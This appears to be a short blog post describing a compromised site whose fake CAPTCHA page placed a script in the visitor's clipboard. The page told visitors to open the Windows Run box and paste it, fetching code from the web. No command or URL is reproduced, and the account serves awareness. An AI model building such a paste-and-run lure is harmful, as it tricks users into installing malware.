If a hacker can’t hack the system, he’ll hack the organic component, otherwise known as the user. In this case, the email the link was found wasn’t actually malicious, so I won’t post it here. It was a legitimate email linking to a site that happened to have been compromised and used to spread malware. It’s the way it tried to spread malware is the part I find interesting.
I’m not going to try to hide the URL in question but later attempts to examine the malicious site failed, which tells me it was likely fixed relatively quickly.
Upon visiting the site, I was shown a captcha page that looked different than any other captcha I’ve seen:
Note the steps it provides, instructing the user on how to pass the verification. The first step is to hold the Windows key and press the letter ‘R’. This brings up the Windows “Run” box. The next step is to press Ctrl-V, which is the keyboard shortcut to paste. Doing so pastes a command into the Run box to pull down code from website.
When I tried this, nothing displayed on the screen and Any.Run only detected the test as “Suspicious”. This tells me nothing likely was actually pulled down from the site. Further testing after this provided no additional information as it appears the compromised was resolved. Still I find it the way the site attempted the hack to be very interesting, in addition to how the site automatically placed the script into the workstation’s clipboard. I wonder if anyone fell for it before it was taken down.
–Matt